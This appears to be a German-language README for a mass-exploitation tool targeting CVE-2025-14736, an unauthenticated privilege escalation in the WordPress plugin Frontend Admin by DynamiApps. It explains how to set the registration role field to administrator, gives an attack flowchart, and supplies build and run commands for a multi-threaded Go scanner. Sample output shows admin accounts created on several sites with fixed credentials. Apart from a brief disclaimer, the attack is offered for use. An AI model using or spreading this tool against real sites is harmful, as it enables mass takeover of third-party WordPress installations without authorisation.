
Nicht authentifizierte Privilegieneskalation zum Administrator über das Rollenformularfeld
Autor: Hyun Chiya
| Feld | Wert |
|---|---|
| CVE-ID | CVE-2025-14736 |
| Plugin | Frontend Admin by DynamiApps |
| Betroffene Versionen | <= 3.28.25 |
| Schwachstellentyp | Nicht authentifizierte Rechteausweitung |
| Schweregrad | Kritisch |
Das Frontend Admin Plugin für WordPress ist aufgrund unzureichender Validierung benutzergesteuerter Felder während der Registrierung anfällig für nicht authentifizierte Rechteausweitung. Angreifer können beliebige Rollen injizieren, darunter administrator, indem sie die Formularübermittlungsdaten manipulieren.
Die anfällige Logik liegt in der Verarbeitung von Formularübermittlungen, bei der das role-Feld aus der Benutzereingabe übernommen wird, ohne zu überprüfen, ob der Benutzer berechtigt ist, diese Rolle zuzuweisen. Insbesondere kann das Feld acff[user][field_user_role_ID] auf administrator geändert werden.
flowchart TD
A["Attacker visits Registration Page"] --> B["Extract Nonce (_acf_nonce) & Form ID (_acf_form)"]
B --> C["Construct POST payload with 'role'='administrator'"]
C --> D["POST to /wp-admin/admin-ajax.php"]
D --> E{"Verification"}
E -->|Success| F["New Admin User Created"]
style F fill:#ff6b6b,stroke:#c92a2a,color:#fffgo build -o mass_exploit.exe mass_exploit.go
.\mass_exploit.exe -l list.txt -t 50
| Argument | Beschreibung |
|---|---|
-l | Pfad zur Liste der Ziel-URLs (Standard: list.txt) |
-t | Anzahl gleichzeitiger Threads (Standard: 10) |
-timeout | Anfrage-Timeout in Sekunden (Standard: 15) |
>> [ ONLINE ]
╔═══════════════════════════════════════════════════════════════════════════════════════╗
║ CVE-2025-14736 - Massen-Exploit-Tool ║
║ Frontend Admin von DynamiApps Rechteausweitung ║
║ Autor: Hyun Chiya ║
╚═══════════════════════════════════════════════════════════════════════════════════════╝
>> [ INFORMATION ]
[*] 500 Ziele geladen. Scan mit 50 Threads wird gestartet...
[ERFOLG] http://target.com | Benutzer: hacker_mass | Passwort: Password123! | FormID: 48
[ERFOLG] http://example.org | Benutzer: hacker_mass | Passwort: Password123! | FormID: 32
[*] Scan abgeschlossen.
Dieses Tool wird ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken bereitgestellt. Unbefugter Zugriff auf Computersysteme ist illegal. Verwenden Sie es verantwortungsbewusst.
Hyun Chiya